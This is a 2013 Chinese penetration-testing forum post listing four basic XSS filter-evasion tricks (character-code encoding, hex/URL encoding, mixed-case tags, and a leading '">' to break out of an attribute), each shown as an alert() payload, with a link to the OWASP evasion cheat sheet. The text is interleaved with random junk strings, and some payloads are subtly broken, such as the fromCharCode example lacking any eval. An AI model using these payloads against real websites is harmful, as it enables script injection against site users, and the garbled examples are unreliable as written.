中国网络渗透测试联盟

标题: XSS 绕过技术 [打印本页]

作者: admin    时间: 2013-2-14 00:10
标题: XSS 绕过技术
四种超级基础的绕过方法。, ~* b* _" N& U" F
1.转换为ASCII码/ Q5 X0 |$ j. r' d( v! e  P
例子:原脚本为<script>alert(‘I love F4ck’)</script >$ ^6 i, K8 }: f& V! {  J% R' m, ?
通过转换,变成:
$ E( s. K! _7 @2 G: L, {9 G<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>& ^% B& A6 T0 H$ ]
1 C, `4 @) I) r, o
2.转换为HEX(十六进制). S; X( b! W0 x# D, B$ u
例子:原脚本为<script>alert(‘I love F4ck’)</script>6 I+ Y, }  v) y9 }
通过转换,变成:
8 G8 L0 M$ [9 m% _# I* ~( i5 k%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e0 i9 s. Q! x4 d* c. j1 k+ r
/ a  W8 {% r9 j! B8 I
3.转换脚本的大小写
  x: v6 R+ x( a例子:原脚本为<script>alert(‘I love F4ck’)</script>
) G2 A( Y) l3 Y2 B& ]转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
3 C2 \0 _& B/ g; k6 z( t * a* V) a+ Q" W, g
4.增加闭合标记”>5 R+ z9 h: ?9 T
例子:原脚本为<script>alert(‘I love F4ck’)</script>
6 o1 i: ~0 A. X* H& L" z0 ~; b# J转换为:”><script>alert(‘I love F4ck’)</script>
6 e. {7 J: [' O( {: P" E更详细绕过技术请参考此网页* P: I$ |3 Q* V  p
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet5 ]+ S0 q- ]6 o3 \. B8 Y

* U$ H. F& W7 i( o, x转换工具使用的是火狐的 hackbar mozilla addon.




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2